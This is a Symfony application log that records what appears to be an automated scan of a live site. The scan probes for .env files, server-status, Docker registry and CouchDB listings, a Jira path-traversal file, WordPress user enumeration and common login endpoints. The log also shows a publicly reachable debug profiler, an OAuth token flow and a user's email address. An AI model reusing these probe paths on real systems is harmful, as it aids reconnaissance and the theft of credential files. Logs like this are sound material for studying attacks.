[2025-12-16 17:01:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:42] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
[2025-12-16 17:01:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:51] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
[2025-12-16 17:01:51] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 17:01:51] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:01:51] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:01:51] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 17:01:51] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 17:01:51] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 17:06:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 17:06:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-16 17:06:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /formaction"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /formaction\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:06:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/auth/signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/auth/signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:06:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/auth/callback"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/auth/callback\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:06:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /auth/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /auth/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:06:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /auth/signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /auth/signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:06:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:06:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /signin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /signin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:06:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /dashboard"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /dashboard\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:06:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /admin"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /admin\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:06:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /account"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /account\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:06:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /profile"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /profile\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:06:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /settings"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /settings\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:06:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/user"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/user\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:06:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/profile"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/profile\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:06:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:06:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /submit"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /submit\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:20:38] request.INFO: Matched route "_profiler_search". {"route":"_profiler_search","route_parameters":{"_controller":"web_profiler.controller.profiler:searchAction","_route":"_profiler_search"},"request_uri":"https://www.unda.co/_profiler/search?limit=10","method":"GET"} []
[2025-12-16 17:20:38] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"770c18","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/770c18/search/results?limit=10","method":"GET"} []
[2025-12-16 17:20:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10","method":"GET"} []
[2025-12-16 17:21:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"037234","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/037234?panel=request","method":"GET"} []
[2025-12-16 17:21:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-16 17:24:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3259f5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/3259f5?panel=swiftmailer","method":"GET"} []
[2025-12-16 17:24:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-16 17:27:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d9f0f2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d9f0f2","method":"GET"} []
[2025-12-16 17:27:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 17:34:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"af2b6f","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/af2b6f","method":"GET"} []
[2025-12-16 17:34:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 17:34:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d9ab8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1d9ab8?panel=swiftmailer","method":"GET"} []
[2025-12-16 17:34:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-16 17:41:53] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
[2025-12-16 17:41:53] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
[2025-12-16 17:41:53] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["b4d892c3ef2ead92fe6df7ec53 [...]"] []
[2025-12-16 17:41:53] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 17:41:53] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"023018c29c69676569a91dd1d9 [...]","3":"2025-12-16 18:11:53","4":"","5":490,"6":"[]"} []
[2025-12-16 17:41:53] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 17:41:53] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 17:41:53] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"20f8941d055a9c3d50806828e2 [...]","3":"2026-02-14 17:41:53","4":"","5":490,"6":"[]"} []
[2025-12-16 17:41:53] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 17:41:53] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 17:41:53] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"b4d892c3ef2ead92fe6df7ec53 [...]"] []
[2025-12-16 17:41:53] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 17:41:54] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-16 17:41:54] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 17:41:54] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["023018c29c69676569a91dd1d9 [...]"] []
[2025-12-16 17:41:54] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [490] []
[2025-12-16 17:41:54] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"e.r_roca@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:41:54] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
